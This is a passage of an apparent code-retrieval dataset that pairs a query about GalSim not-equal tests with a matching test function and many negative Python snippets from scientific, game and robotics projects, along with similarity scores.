value\\(s\\)'):\n with np.errstate(all=\"ignore\"):\n bb_lam = bb(wave) * u.sr\n flux = bb_lam.to(photlam, u.spectral_density(wave * u.AA)) / u.sr\n\n # First element is NaN, last element is very small, others normal\n assert np.isnan(flux[0])\n with np.errstate(all=\"ignore\"):\n assert np.log10(flux[-1].value) < -134\n np.testing.assert_allclose(\n flux.value[1:-1], [0.00046368, 0.04636773], rtol=1e-3\n ) # 0.1% accuracy in PHOTLAM/sr\n with np.errstate(all=\"ignore\"):\n flux = bb(1.0 * u.AA)\n assert flux.value == 0", "def shooting(self):\r\n return not self.stopped", "def test_particles(snaptype):\n filename = DIR / snaptype.filename\n snap = plonk.load_snap(filename)\n\n snap.set_molecular_weight(2.381)\n\n _test_particles(snap=snap, ignore=False)\n _test_particles(snap=snap, ignore=True)\n\n snap.close_file()", "def __init__(self, box):\n self.is_hidden = False\n self.last_boxes = []\n self.best_box = None\n self.frames_undetected = 0\n self.age = 0\n self.n_frames = 10\n\n self.update(box)", "def draw_trigger_volume(world, actor):\n transform = actor.get_transform()\n tv = transform.transform(actor.trigger_volume.location)\n bbox = carla.BoundingBox(tv, actor.trigger_volume.extent)\n world.debug.draw_box(bbox, transform.rotation, life_time=1000)", "def test_run_homer(self):\n \n #foreground = clipper.test_file(\"clip_analysis_test_peak_results.bed.all.real.fa\")\n #background = clipper.test_file(\"clip_analysis_test_peak_results.bed.all.random.fa\")\n #run_homer(foreground, background)", "def aperture_phot(self,data,x,y,v):\n r = np.sqrt((x-self.avg_map_fits['Values'][1])**2 + (y-self.avg_map_fits['Values'][3])**2)\n \n inner = (r < 8./60.) & np.isfinite(data) \n outer = (r > 8.5/60.) & (r < 12./60.) 
& np.isfinite(data)\n\n annu = np.nanmedian(data[outer])\n annu_rms = np.nanstd(data[outer])\n flux = np.sum(data[inner]) - annu*np.sum(inner)\n\n c = 3e8\n kb=1.38e-23\n beam = (1./60.*np.pi/180.)**2\n factor = 2*kb*(v*1e9/c)**2 * beam * 1e26\n return flux*factor, annu_rms*np.sqrt(np.sum(inner))*factor", "def ship_shoot(ship, x, y):\n click.echo('Ship %s fires to %s,%s' % (ship, x, y))", "def b_s2o_freetime_shooter(meoe0, meoef, A, B, dt, shooterInfo):\n \n # -----------------------------------------------------------\n ## Initial Integration ##\n \n # Getting segement initial conditions\n IC_pert = np.hstack((meoe0, shooterInfo['m0']))\n tspan = [shooterInfo['t0'], dt]\n X_pert = odeint(shooterInfo['ode_burn'], IC_pert, tspan, \n args=shooterInfo['extras_burn'] + (A,B), \n rtol=shooterInfo['reltol'], atol=shooterInfo['abtol'])\n\n # Calculating Initial Error\n error_vec = []\n meoet = meoef[0:5]; beta = np.sqrt(dt)\n error_vec.append(X_pert[-1][0:5] - meoet)\n error_vec.append(dt - beta**2)\n error_vec = np.hstack(error_vec)\n error_mag = np.sqrt(error_vec.dot(error_vec))\n print('\\nInital Error:', '{:.4e}'.format(error_mag))\n # -----------------------------------------------------------\n\n # -----------------------------------------------------------\n ## Multiple Shooter ##\n\n # Preparing shooter\n IC_gnc = np.copy(IC_pert) # initial condition\n Xf_gnc = np.copy(X_pert[-1]) # final values maneuver, needed for finite differencing\n A_gnc = np.copy(A) # A BLT parameters\n B_gnc = np.copy(B) # B BLT parameters\n dt_gnc = np.copy(dt) # integration time of ms segments\n beta_gnc = np.copy(beta) # time slack variable\n \n tol = 1e-6; local_min = False\n count = 1; count_tol = 100; inner_count_tol = 5\n du_reduction = 10.; du_mod = 1.\n \n while True:\n \"\"\"\n This single-burn single shooter algorithm uses finite \n differencing to find Gamma, which maps changes in the control \n to changes in the error vector to null the error vector. The \n control vectors, error vectors, and Gamma (the Jacobian matrix \n de/du) are shown below.\n\n e = [p(tf) - pt u = [A\n f(tf) - ft B\n g(tf) - gt dt\n h(tf) - ht b ]\n k(tf) - kt \n dt - b^2]\n \n Calculated with Finite Differencing\n\n Gamma_(6x8) = de/du = [dp(tf)/dA dp(tf)/dB dp(tf)/ddt 0\n df(tf)/dA df(tf)/dB df(tf)/ddt 0\n dg(tf)/dA dg(tf)/dB dg(tf)/ddt 0\n dh(tf)/dA dh(tf)/dB dh(tf)/ddt 0\n dk(tf)/dA dk(tf)/dB dk(tf)/ddt 0\n 0 0 1 -2b1] \n \"\"\"\n # -------------------------------------------------------\n # Calculating Gamma\n\n m = 6; n = 8\n gamma = np.zeros((m,n))\n gamma[5,6] = 1. 
\n gamma[5,7] = -2*beta_gnc\n\n # Finite Differencing\n for j in range(n-1): # looping over u\n\n # Control Parameters\n IC_fd = np.copy(IC_gnc)\n A_fd = np.copy(A_gnc)\n B_fd = np.copy(B_gnc)\n dt_fd = np.copy(dt_gnc)\n\n # Perturbing Control Parameters (order: oes, A, B, dt)\n if 0 <= j < 3:\n # A BLT parameters\n fd_parameter = 1e-6*abs(A_fd[j]) + 1e-7\n A_fd[j] += fd_parameter\n elif 3 <= j < 6:\n # B BLT parameters\n fd_parameter = 1e-6*abs(B_fd[j-3]) + 1e-7\n B_fd[j-3] += fd_parameter\n else:\n # Time\n fd_parameter = 1e-6*abs(dt_fd) + 1e-7\n dt_fd += fd_parameter\n\n # Integration\n X_fd = odeint(shooterInfo['ode_burn'], IC_fd, [shooterInfo['t0'], dt_fd], \n args=shooterInfo['extras_burn'] + (A_fd, B_fd), \n rtol=shooterInfo['reltol'], atol=shooterInfo['abtol'])\n\n for k in range(m-1): # Looping over e\n diff = X_fd[-1][k] - Xf_gnc[k]\n gamma[k,j] = diff/fd_parameter\n # -------------------------------------------------------\n\n # -------------------------------------------------------\n # Correction\n\n # Finding nominal control correction\n gamma_inv = gamma.transpose() @ np.linalg.inv(gamma @ gamma.transpose())\n du = -np.dot(gamma_inv, error_vec)/du_mod\n\n print('\\nIt:', count, '|', 'Current Error:', '{:.4e}'.format(error_mag))\n\n # Finding Correction\n inner_count = 0\n error_test = [error_mag]\n while True:\n\n # Control Parameters\n IC_test = np.copy(IC_gnc)\n A_test = np.copy(A_gnc)\n B_test = np.copy(B_gnc)\n dt_test = np.copy(dt_gnc)\n beta_test = np.copy(beta_gnc)\n\n # Applying Updates\n A_test += du[0:3]\n B_test += du[3:6]\n dt_test += du[6]\n beta_test += du[7]\n\n # Integrating with new initial conditions\n X_test = odeint(shooterInfo['ode_burn'], IC_test, [shooterInfo['t0'], dt_test], \n args=shooterInfo['extras_burn'] + (A_test, B_test), \n rtol=shooterInfo['reltol'], atol=shooterInfo['abtol'])\n\n # Calculating new error\n error_vec = []\n error_vec.append(X_test[-1][0:5] - meoet)\n error_vec.append(dt_test - beta_test**2)\n error_vec = np.hstack(error_vec)\n error_check = np.sqrt(error_vec.dot(error_vec))\n\n inner_count += 1\n \n # Inner loop stopping conditions\n if inner_count > inner_count_tol:\n local_min = True\n break\n\n elif error_check/error_mag < 1:\n error_test.append(error_check)\n break\n\n elif error_check/error_mag >= 1:\n print('\\tReducing du by', du_reduction)\n du /= du_reduction\n\n error_mag = error_check\n IC_gnc = IC_test; Xf_gnc = X_test[-1]; A_gnc = A_test; B_gnc = B_test; dt_gnc = dt_test; beta_gnc = beta_test\n\n # Stopping Conditions\n if error_mag < tol:\n print('\\nSuccessful Convergence :)')\n break\n\n elif local_min:\n print('\\nUnsuccessful Convergence :(')\n break\n\n elif count > count_tol:\n print('\\nUnsuccessful Convergence :(')\n break\n\n count += 1\n # -------------------------------------------------------\n # -----------------------------------------------------------\n\n return [IC_gnc], [Xf_gnc], A_gnc, B_gnc, dt_gnc", "def test2(self):\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.initialize()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.sweepDuckie()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieAlignX()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieAlignY()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieLowerEE()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieSuctionOn()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieLiftEE()\r\n\t\tself._motion.terminate()", "def 
start_shooting(agent):\n agent.step = Step.Shooting\n target = shooting_target(agent)\n speed = get_speed(agent, target)\n agent.drive.target = target\n agent.drive.speed = speed", "def morphology(seed=425, th=120):\n \n # impact parameters\n M = 1e8*u.Msun\n B = 19.85*u.kpc\n V = 220*u.km/u.s\n phi = coord.Angle(0*u.deg)\n theta = coord.Angle(th*u.deg)\n Tenc = 0.01*u.Gyr\n T = 0.5*u.Gyr\n dt = 0.1*u.Myr\n rs = 0*u.pc\n \n # potential parameters\n potential = 3\n Vh = 220*u.km/u.s\n q = 1*u.Unit(1)\n rhalo = 20*u.pc\n par_pot = np.array([Vh.si.value, q.value, rhalo.si.value])\n \n # setup tube\n Nstar = 3000\n wx = 30*u.kpc\n wy = 0*u.pc\n wz = 0*u.pc\n sx = 0*u.km/u.s\n \n np.random.seed(seed)\n \n xphi = np.linspace(-0.3*np.pi,0.3*np.pi, Nstar)\n xr = 20*u.kpc + np.random.randn(Nstar)*0.02*u.kpc\n x = np.sin(xphi) * xr\n y = np.cos(xphi) * xr\n z = x * 0\n vx = -np.cos(xphi) * Vh\n vy = np.sin(xphi) * Vh\n vz = vx * 0\n \n potential_perturb = 1\n par_perturb = np.array([M.si.value, 0., 0., 0.])\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n\n plt.close()\n fig, ax = plt.subplots(3,1,figsize=(12,8), sharex=True)\n \n c_init = mpl.cm.Blues_r(1)\n c_fin0 = mpl.cm.Blues_r(0.5)\n c_fin = mpl.cm.Blues_r(0.2)\n \n eta = coord.Angle(np.arctan2(np.sqrt(stream['x'][0].to(u.kpc).value**2 + stream['x'][1].to(u.kpc).value**2),xr.to(u.kpc).value)*u.rad)\n xi = np.arctan2(stream['x'][1].to(u.kpc).value, stream['x'][0].to(u.kpc).value)\n xi = coord.Angle((xi - np.median(xi))*u.rad)\n \n vlabel = ['x', 'y', 'z']\n \n for i in range(3):\n plt.sca(ax[i])\n im = plt.scatter(xi.deg, eta.deg, c=stream['v'][i].value, s=20)\n \n plt.xlim(-60, 50)\n plt.ylim(55, 35)\n plt.gca().set_aspect('equal')\n \n if i==2:\n plt.xlabel('$\\phi_1$ [deg]')\n plt.ylabel('$\\phi_2$ [deg]')\n \n divider = make_axes_locatable(plt.gca())\n cax = divider.append_axes(\"right\", size=\"3%\", pad=0.1)\n plt.colorbar(im, cax=cax)\n plt.ylabel('$V_{{{}}}$ [km s$^{{-1}}$]'.format(vlabel[i]))\n \n plt.tight_layout()", "def setup_pwn(name,pwndata,phase, free_radius=5, tempdir=None, emin=1.0e2, emax=1.0e5,maxroi=10,model=None,**kwargs):\n sources=yaml.load(open(pwndata))\n\n catalog_name=sources[name]['catalog']\n ltcube=sources[name]['ltcube']\n pulsar_position=SkyDir(*sources[name]['dir'])\n ft2=sources[name]['ft2']\n ft1=sources[name]['ft1']\n\n # in case no list was passed\n if len(phase)==2 and isinstance(phase[0],numbers.Real) and \\\n isinstance(phase[1],numbers.Real):\n\n # write in case phase wraps around.\n if phase[0]>phase[1]:\n phase=[[phase[0],1.0],[0.0,phase[1]]]\n else:\n phase = [phase] \n\n phase_factor=get_phase_factor(phase)\n print \"phase\"\n print phase\n print \"phase_factor=%.2f\"%phase_factor\n\n catalog=FermiCatalog(e(\"$FERMI/catalogs/gll_psc_v02.fit\"),free_radius=free_radius)\n catalog_source=[i for i in catalog.get_sources(SkyDir(),180) if i.name==catalog_name][0]\n\n center=catalog_source.skydir\n\n if tempdir is None: tempdir=mkdtemp(prefix='/scratch/')\n\n binfile=j(tempdir,'binned_phased.fits')\n\n # apply phase cut to ft1 file\n phased_ft1 = j(tempdir,'ft1_phased.fits')\n phasetools.phase_cut(ft1,phased_ft1,phaseranges=phase)\n\n # create a temporary ltcube scaled by 
the phase factor\n# phased_ltcube=j(tempdir,'phased_ltcube.fits')\n# phase_ltcube(ltcube,phased_ltcube, phase=phase)\n phased_ltcube=ltcube\n from uw.like.pointspec import DataSpecification\n data_specification = DataSpecification(\n ft1files = phased_ft1,\n ft2files = ft2,\n ltcube = phased_ltcube,\n binfile = binfile)\n\n spectral_analysis = SpectralAnalysis(data_specification,\n binsperdec = 4,\n emin = 100,\n emax = 100000,\n irf = \"P6_V3_DIFFUSE\",\n roi_dir = center,\n maxROI = maxroi,\n minROI = maxroi)\n\n if model == None :\n roi=spectral_analysis.roi(\n roi_dir=center,\n diffuse_sources=get_default_diffuse(diffdir=e(\"$FERMI/diffuse\"),\n gfile=\"gll_iem_v02.fit\",\n ifile=\"isotropic_iem_v02.txt\"),\n catalogs = catalog,\n phase_factor = 1.0,\n fit_emin = [emin,emin],\n fit_emax = [emax,emax],\n **kwargs)\n else :\n roi=spectral_analysis.roi(\n roi_dir=center,\n xmlfile = model,\n phase_factor =1.0,\n fit_emin = [emin,emin],\n fit_emax = [emax,emax],\n **kwargs)\n\n print \"---------------------Energy range--------------------\"\n \n print \"emin=\"+str(roi.bands[0].emin)+\"\\n\"\n print \"emax=\"+str(roi.bands[len(roi.bands)-1].emax)+\"\\n\"\n \n\n # keep overall flux of catalog source,\n # but change the starting index to 2.\n roi.modify(which=catalog_name, name=name, index=2, \n keep_old_flux=True)\n\n return roi", "def step(self, action):\n if not hasattr(self, \"robot\"):\n raise RuntimeError(\"reset before step!!!\")\n\n control_miniBox(self.robot.robot, instruction=action, target_velocity=self.target_velocity,\n multiply=self.multiply, left_wheel_joint_index=self.left_wheel_joint_index,\n right_wheel_joint_index=self.right_wheel_joint_index, max_force=self.max_force, \n physicsClientId=self._physics_client_id)\n \n p.stepSimulation(physicsClientId=self._physics_client_id) \n self.step_num += 1\n state = self.robot.get_observation(self.target_pos)\n reward = self.__reward_func(state)\n if state[-2] < self.target_radius:\n done = True\n elif self.step_num > self.done_step_num:\n done = True\n else:\n done = False\n info = {\"distance\" : state[-2], \"collision_num\" : self.collision_num}\n\n # under evaluate mode, extra debug items need to be rendered\n if self._evaluate:\n froms, tos, results = rayTest(self.robot.robot, ray_length=self.laser_length, ray_num=self.laser_num)\n for index, result in enumerate(results):\n self.rayDebugLineIds[index] = p.addUserDebugLine(\n lineFromXYZ=froms[index], \n lineToXYZ=tos[index] if result[0] == -1 else result[3], \n lineColorRGB=self.miss_color if result[0] == -1 else self.hit_color, \n lineWidth=self.ray_debug_line_width, \n replaceItemUniqueId=self.rayDebugLineIds[index]\n )\n\n return np.array(state), reward, done, info", "def create_simulation_box(Lx,Ly,Lz,nmol,molname,vdwradius,boxfilename, topfilename=None):\n\n os.system('gmx insert-molecules \\\n -box %s %s %s \\\n -nmol %s \\\n -ci %s.pdb \\\n -radius %s \\\n -o %s &> out.log'%(Lx,Ly,Lz,nmol,molname,vdwradius,boxfilename))\n\n \n # Actual nmol added\n with open('out.log', 'r') as f:\n for line in f:\n if 'Added' in line:\n nmol = int(line.split()[1])\n \n # read <molname>.top\n with open('%s.top'%molname, 'r') as f:\n data = ''\n for line in f:\n if len(line.split())!=0 and line.split()[0]=='%s'%molname:\n data+='%s'%molname + ' '*(9-len(molname)) + '%s\\n'%nmol\n else:\n data+=line\n \n if topfilename==None:\n # Update number of PA molecules in <molname>.top file \n with open('%s.top'%molname, 'w') as f:\n f.write(data)\n else:\n # Create <newtopfilename> file \n with 
open('%s'%topfilename, 'w') as f:\n f.write(data)", "def inject_planet(self,data, psf_library, c_ratio=[0.01, 0.1], x_bound=[4, 61], y_bound=[4, 61], no_blend=False):\n\n image = data.copy()\n pl_num = np.random.randint(1, high=4)\n pos_label = np.zeros([64, 64])\n used_xy = np.array([])\n c_prior = np.linspace(c_ratio[0], c_ratio[1], 100)\n if x_bound[0] < 4 or x_bound[0] > 61:\n raise Exception(\"current method only injects whole psf\")\n if y_bound[0] < 4 or y_bound[0] > 61:\n raise Exception(\"current method only injects whole psf\")\n\n for num in range(pl_num):\n while True:\n np.random.shuffle(c_prior)\n psf_idx = np.random.randint(0, high=psf_library.shape[0])\n Nx = np.random.randint(x_bound[0], high=x_bound[1])\n Ny = np.random.randint(y_bound[0], high=y_bound[1])\n if len(used_xy) == 0:\n pass\n else:\n if no_blend:\n if np.any(dist([Nx, Ny], used_xy) < 3):\n pass\n else:\n if np.any(np.array([Nx, Ny]) == used_xy):\n pass\n if dist([Nx, Ny], (32.5, 32.5)) < 4:\n pass\n else:\n planet_psf = psf_library[psf_idx]\n brightness_f = c_prior[0] * np.max(image) / np.max(planet_psf)\n image[Ny - 4:Ny + 3, Nx - 4:Nx + 3] += planet_psf * brightness_f\n used_xy = np.append(used_xy, [Nx, Ny]).reshape(-1, 2)\n pos_label[Ny - 4:Ny + 3, Nx - 4:Nx + 3] = 1\n break\n return image, pos_label", "def roll_out(self, t):\n global potted_stripes, potted_solids\n if (self.potted == True) and (self.vx != 0.0):\n\n self.x += self.vx * t\n v_norm = np.sqrt(self.vx ** 2 + self.vy ** 2)\n self.phi = t * v_norm / self.radius\n\n # Here we save the rotation of the ball\n glPushMatrix()\n glLoadIdentity()\n\n if v_norm > 0.0:\n glRotatef(self.phi * 180.0 / np.pi, -self.vy / v_norm, self.vx / v_norm, 0.0)\n glMultMatrixd(self.matrix)\n glGetDoublev(GL_MODELVIEW_MATRIX, self.matrix)\n\n glPopMatrix()\n\n if (self.number > 8) and (self.vx < 0.0) and (self.x <= 1440 + potted_stripes * (np.pi * self.radius)) and (self.visible == False):\n self.vx = 0.0\n self.x = 1440 + potted_stripes * (np.pi * self.radius)\n potted_stripes += 1\n\n if (self.number <= 8) and (self.number > 0) and (self.vx > 0.0) and (self.x >= 1300 - potted_solids * (np.pi * self.radius)) and (self.visible == False):\n self.vx = 0.0\n self.x = 1300 - potted_solids * (np.pi * self.radius)\n potted_solids += 1", "def create_human_box(self, i):\n self.box = self.detections[0, 0, i, 3:7] * np.array([self.w, self.h, self.w, self.h])\n (self.startX, self.startY, self.endX, self.endY) = self.box.astype(\"int\")", "async def philo(self, context):\n\n await random_image(context, 'philo')", "def draw(self, screen):\n screen.blit(self.image, (self.rect.x, self.rect.y))\n if self.boss.treasureCaptured:\n screen.blit(pygame.transform.scale(self.image, (7, 7)), (self.rect.x + self.boss.width -4, self.rect.y - 15))", "def test_fly_to_mouse_position(verify_image_cache, sphere):\n pl = pyvista.Plotter()\n pl.add_mesh(sphere)\n pl.show(auto_close=False)\n width, height = pl.window_size\n cpos_before = pl.camera_position\n pl.iren._mouse_move(width - width // 4, height // 2)\n pl.fly_to_mouse_position()\n assert cpos_before != pl.camera_position\n pl.close()", "def test_if_mario_is_falling(self):\n self.mario.rect.y += 1\n test_collide_group = pygame.sprite.Group(self.ground_step_pipe_group)\n\n self.mario.rect.y -= 1", "def goalControl(state, powerControl):\n return shoot(state, powerControl)", "def hesitant_action(self):\n if not self.agent.done:\n if not self.opponenet.done:\n self.EV = self.opponenet.pumps - np.random.randint(1,5)\n else:\n if 
self.opponenet.cashed:\n self.EV = self.opponenet.pumps + 1\n elif self.opponenet.popped:\n if not self.stopCount:\n if self.agent.pumps == 0:\n self.EV = np.random.randint(1,10)\n else:\n self.EV = self.agent.pumps\n self.stopCount = True\n self.action_gating()", "def fire_smelter(self):\n # Get the smelter\n screenshot = utils.take_screenshot()\n forge = screenshot[152:168, 168:184]\n\n # Check if the cold forge exists\n result = cv2.matchTemplate(forge, self.cold_forge_template, cv2.TM_CCORR_NORMED)\n max_val = cv2.minMaxLoc(result)[1]\n\n # Found cold forge, light it and wait\n if max_val > 0.9:\n pyautogui.moveTo(192, 159, 0.15)\n pyautogui.doubleClick()\n sleep(1.5)", "def step(self, action):\n\n # determine if gripper could grasp the ObjectToPickUp\n gripperR = action[0].astype(np.float64)\n gripperPhi = action[1].astype(np.float64)\n\n # # for testing purposes\n # gripperR = 0.1\n # gripperPhi = self.winkel[self.stepcount]\n # self.stepcount += 1\n\n self.gripper.place(gripperR, gripperPhi)\n\n logging.debug(\"moving arm to position: [{0} {1}]\".format(gripperR, gripperPhi))\n logging.debug(\"box position: [{0} {1} {2}]\".format(self.box.pos[0], self.box.pos[1], self.box.phi))\n\n reward, graspSuccess = self.calculateReward()\n logging.debug(\"received reward: \" + str(reward))\n\n # re-place object to pick up if grasp was successful\n # if(graspSuccess):\n self.box.place(randomPlacement=True)\n\n # get depth image\n image = self.kinect.getImage(self.box, filter=False, flattenImage=self.flattenImage, saveImage=True)\n\n self.state = image\n done = True\n info = {}\n\n return self.state, reward, done, info", "def _SerialShootGameHurt(self, taskPB, taskVal):\n taskPB.nTaskID = self._GetValueFromDict(taskVal, 'taskID')\n taskPB.eType = gameregProtoc_pb2.TYPE_SHOOTHURT\n # taskPB.nSkipFrame = self._GetValueFromDict(taskVal, 'skipFrame')\n\n for element in self._GetValueFromDict(taskVal, 'elements'):\n elementPB = taskPB.stPBAgentTaskElements.add()\n\n rect = elementPB.stPBRect\n self._SerialRect(rect, self._GetValueFromDict(element, 'ROI'))\n\n elementPB.fThreshold = self._GetValueFromDict(element, 'threshold')" ]
[ "0.6883019", "0.60247976", "0.5729917", "0.5662367", "0.5657805", "0.56022036", "0.5602087", "0.55716115", "0.5532589", "0.5502499", "0.5473831", "0.54660267", "0.54527724", "0.54423535", "0.5430135", "0.5401244", "0.5400176", "0.53518057", "0.53516215", "0.53498757", "0.5337529", "0.53322077", "0.5329076", "0.53124714", "0.5286162", "0.52783287", "0.5278177", "0.523128", "0.52156144", "0.52107227", "0.5206619", "0.5187274", "0.51793456", "0.51743937", "0.5171074", "0.51613307", "0.515808", "0.51381403", "0.5127301", "0.51189893", "0.5111322", "0.51113117", "0.5098409", "0.5096037", "0.5093395", "0.5090522", "0.50848174", "0.50807905", "0.5076153", "0.50684416", "0.5067889", "0.5067217", "0.5059826", "0.50588363", "0.5058114", "0.5051044", "0.50377613", "0.5036234", "0.50340104", "0.5023296", "0.5020437", "0.5019894", "0.4988065", "0.49848914", "0.49792257", "0.49767885", "0.49753058", "0.49623987", "0.49569786", "0.49558154", "0.49555737", "0.4950926", "0.4947333", "0.49398792", "0.4932968", "0.49278995", "0.49273473", "0.49262607", "0.49199155", "0.49189088", "0.4916471", "0.4912448", "0.49052048", "0.490455", "0.49037242", "0.490186", "0.48976868", "0.489527", "0.48949003", "0.48938626", "0.48817968", "0.48814943", "0.4872637", "0.48719978", "0.48706776", "0.48660603", "0.48637837", "0.48606348", "0.4857047", "0.48564142" ]
0.72881216
0
Test base.py GSObjects for notequals.
def test_ne(): # Define some universal gsps gsp = galsim.GSParams(maxk_threshold=1.1e-3, folding_threshold=5.1e-3) # Pixel. Params include scale, flux, gsparams. # gsparams. # The following should all test unequal: gals = [galsim.Pixel(scale=1.0), galsim.Pixel(scale=1.1), galsim.Pixel(scale=1.0, flux=1.1), galsim.Pixel(scale=1.0, gsparams=gsp)] all_obj_diff(gals) # Box. Params include width, height, flux, gsparams. # gsparams. # The following should all test unequal: gals = [galsim.Box(width=1.0, height=1.0), galsim.Box(width=1.1, height=1.0), galsim.Box(width=1.0, height=1.1), galsim.Box(width=1.0, height=1.0, flux=1.1), galsim.Box(width=1.0, height=1.0, gsparams=gsp)] all_obj_diff(gals) # TopHat. Params include radius, flux, gsparams. # gsparams. # The following should all test unequal: gals = [galsim.TopHat(radius=1.0), galsim.TopHat(radius=1.1), galsim.TopHat(radius=1.0, flux=1.1), galsim.TopHat(radius=1.0, gsparams=gsp)] all_obj_diff(gals)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_not_equal_on_equal(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n self.assertFalse(a != b)\n self.assertFalse(b != a)", "def test_not_equal_on_not_equal_value(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_b, enums.OpaqueDataType.NONE)\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def test_equal_on_not_equal_value(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_b, enums.OpaqueDataType.NONE)\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def test_ne(self):\n dummy = DummyCryptographicObject()\n self.assertFalse(dummy != dummy)", "def test_not_equal(self):\n x = Point(\n lat=24.4,\n lng=23.1,\n author=self.u\n )\n self.assertFalse(self.a == x)\n self.assertTrue(self.a != x)", "def test_nonEquality(self):\n # Make explicitly sure we're using !=:\n self.assertFalse(Comparable(1) != Comparable(1))\n self.assertTrue(Comparable(2) != Comparable(1))", "def __ne__(self, obj):\r\n return assert_(self.obj != obj, '%r == %r' % (self.obj, obj))", "def test_equality_check_against_other_object_doesnt_raise_exception(self):\n test_object = Vec3(1, 2, 3)\n self.assertFalse(test_object == Quat(1, 2, 3, 4))\n self.assertFalse(Quat(1, 2, 3, 4) == test_object)\n self.assertTrue(test_object != Quat(1, 2, 3, 4))\n self.assertTrue(Quat(1, 2, 3, 4) != test_object)", "def test_not_equal(self):\n test1 = self.Test({ 'id': 1, 'name': 'Poop Head' })\n test2 = self.Test({ 'id': 1, 'name': 'Poop Head!' })\n self.assertNotEqual(test1, test2)", "def test_not_equal_on_equal_and_empty(self):\n a = Digest()\n b = Digest()\n\n self.assertFalse(a != b)\n self.assertFalse(b != a)", "def __ne__(self, G):\n return not self.__eq__(G)", "def test_notImplementedNotEquals(self):\n self.assertEqual(Comparable(1).__ne__(object()), NotImplemented)", "def test_eq_false(self):\n self.assertFalse(self.instance == Commit('f3ccd0b70fe758b539c28319735d9a6489c0fb10'))", "def test_not_equal_on_not_equal_data_type(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b.opaque_type = \"invalid\"\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def test_not_equal_on_not_equal(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = Digest()\n c = Digest(\n hashing_algorithm=self.hashing_algorithm_d,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_c)\n d = Digest(\n key_format_type=self.key_format_type_c)\n\n self.assertTrue(a != b)\n self.assertTrue(b != a)\n self.assertTrue(b != c)\n self.assertTrue(b != d)", "def test_notImplementedEquals(self):\n self.assertEqual(Comparable(1).__eq__(object()), NotImplemented)", "def test_not_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def test_eq_false_type(self):\n other = Sample(self.sample_id, SampleTemplate(1))\n self.assertFalse(self.tester == other)", "def __ne__(self, other: object) -> bool:\n return not self.__eq__(other)", "def __ne__(self, obj):\n return not self.__eq__(obj)", "def testEquality(self):\n pass", "def test_not_equal(self):\n utils.compare_tracing_methods(\n 
SimpleCompareOpsModule(\"notEqual\"),\n torch.randn(3, 4, 5),\n torch.randn(3, 4, 5),\n fusible_ops={\"aten::ne\"},\n )", "def __ne__(self, other):\n return not (self == other) # opposite of __eq__", "def __neq__(self, other): \n return not self == other", "def test_equal_on_not_equal_data_type(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b.opaque_type = \"invalid\"\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def test_not_equal_on_equal(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n\n self.assertFalse(a != b)\n self.assertFalse(b != a)", "def __ne__(self, other: object) -> bool:\n if self.__eq__(other):\n return False\n return True", "def test_neq():\n # Test for not equal special method with scalar Rnode object and float value\n x = Rnode(2.0)\n try:\n assert (x != 2) == False\n assert (x != 1) == True\n except AssertionError as e:\n print(e)\n raise AssertionError\n\n # Test for equality special method with two scalar Dual object\n x = Rnode(2.0)\n y = Rnode(2.0)\n z = Rnode(1.0)\n try:\n assert (x != y) == False\n assert (x != z) == True\n except AssertionError as e:\n print(e)\n raise AssertionError", "def __ne__(self, other):\n return not (self == other) # opposite of __eq__", "def test_equal_on_not_equal(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = Digest()\n\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self == other", "def __ne__(self,other):\n return not (self == other)", "def __ne__(self: _TT, other: object) -> bool:\n return self.ne(other) # type: ignore", "def test_eq_false_type(self):\n other = PrepSample(self.sample_id, PrepTemplate(1))\n self.assertFalse(self.tester == other)", "def test_not_eq(self):\n st_1 = State(substance=\"water\", T=Q_(400.0, \"K\"), p=Q_(101325.0, \"Pa\"))\n st_2 = State(substance=\"water\", T=Q_(300.0, \"K\"), p=Q_(101325.0, \"Pa\"))\n assert not st_1 == st_2", "def 